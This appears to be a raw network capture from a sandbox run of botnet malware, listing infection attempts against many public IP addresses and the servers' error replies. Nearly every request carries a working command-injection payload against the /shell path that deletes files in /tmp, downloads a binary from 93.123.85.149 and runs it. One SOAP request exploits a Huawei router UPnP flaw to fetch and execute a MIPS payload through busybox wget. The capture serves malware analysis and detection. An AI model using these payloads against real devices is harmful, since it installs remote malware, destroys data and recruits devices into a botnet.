                                                            Jan 26, 2024 15:31:58.730412006 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:58.900213003 CET500INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 349
                                                            Connection: close
                                                            Date: Fri, 26 Jan 2024 14:31:59 GMT
                                                            Server: HTTP Server
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            292192.168.2.23378902.20.93.980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:58.816454887 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:59.016856909 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:58 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:58 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 31 38 33 31 30 30 32 26 23 34 36 3b 31 37 30 36 32 37 39 35 31 38 26 23 34 36 3b 62 63 39 61 32 63 35 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;e1831002&#46;1706279518&#46;bc9a2c5f</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            293192.168.2.233435846.232.249.23380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:58.828964949 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:59.039870977 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:28:46 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            294192.168.2.2358878178.242.124.21380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:58.866498947 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:59.176192999 CET515INHTTP/1.0 401 Unauthorized
                                                            Content-Type: text/html
                                                            Server: httpd_four-faith
                                                            Date: Fri, 26 Jan 2024 17:32:04 GMT
                                                            Connection: close
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Cache-Control: post-check=0, pre-check=0
                                                            Pragma: no-cache
                                                            WWW-Authenticate: Basic realm="Four-Faith"
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 48 34 3e 0a 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 72 65 71 75 69 72 65 64 2e 20 70 6c 65 61 73 65 20 6e 6f 74 65 20 74 68 61 74 20 74 68 65 20 64 65 66 61 75 6c 74 20 75 73 65 72 6e 61 6d 65 20 69 73 20 22 61 64 6d 69 6e 22 20 69 6e 20 61 6c 6c 20 6e 65 77 65 72 20 72 65 6c 65 61 73 65 73 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>Authorization required. please note that the default username is "admin" in all newer releases</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            295192.168.2.234047013.113.68.2980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:58.895992041 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            296192.168.2.23549885.23.53.20280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:58.910288095 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            297192.168.2.2358916178.242.124.21380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:59.493520021 CET391INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Server: httpd_four-faith
                                                            Date: Fri, 26 Jan 2024 17:32:05 GMT
                                                            Connection: close
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Cache-Control: post-check=0, pre-check=0
                                                            Pragma: no-cache
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            298192.168.2.233367018.165.105.16180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:01.343653917 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:01.447439909 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:32:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            299192.168.2.2348104185.16.89.24180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:01.351917982 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            300192.168.2.235920213.226.190.7880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:01.354130983 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:01.472982883 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:32:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            301192.168.2.2339852116.62.71.21580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:01.559264898 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:01.883327961 CET354INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.14.0 (Ubuntu)
                                                            Date: Fri, 26 Jan 2024 14:32:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 178
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            302192.168.2.2340230104.20.25.880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:01.591473103 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            303192.168.2.235770620.4.150.15380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:01.649352074 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            304192.168.2.2349740185.232.128.13380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:01.702135086 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:01.932176113 CET364INHTTP/1.1 505 HTTP Version not supported
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 140
                                                            Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            305192.168.2.233872818.165.59.19980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:01.702334881 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:01.931407928 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:32:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            306192.168.2.2333608186.132.69.4980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:01.710928917 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:01.952460051 CET424INData Raw: 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6d 69 63 72 6f 5f 68 74 74 70 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32
                                                            Data Ascii: 93.123.85.149/jaws;sh+/tmp/jaws 400 Bad RequestServer: micro_httpdDate: Fri, 26 Jan 2024 14:32:01 GMTConnection: keep-aliveKeep-Alive: timeout=60, max=1000Content-Type: text/htmlContent-Security-Policy: default-src 'self'; frame-an


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            307192.168.2.2339650197.246.45.20137215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:01.755053997 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:02.044411898 CET182INHTTP/1.1 500 Internal Server Error
                                                            Content-Type: text/xml; charset="utf-8"
                                                            Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                                            EXT:
                                                            Connection: Keep-Alive
                                                            Content-Length: 398


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            308192.168.2.2350408116.203.0.3580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:01.763592005 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:01.968238115 CET452INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            X-Frame-Options: SAMEORIGIN
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            309192.168.2.2352544104.107.147.5580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:01.807427883 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:02.055902004 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:32:01 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:01 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 35 33 33 31 33 30 32 26 23 34 36 3b 31 37 30 36 32 37 39 35 32 31 26 23 34 36 3b 36 39 31 64 30 32 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
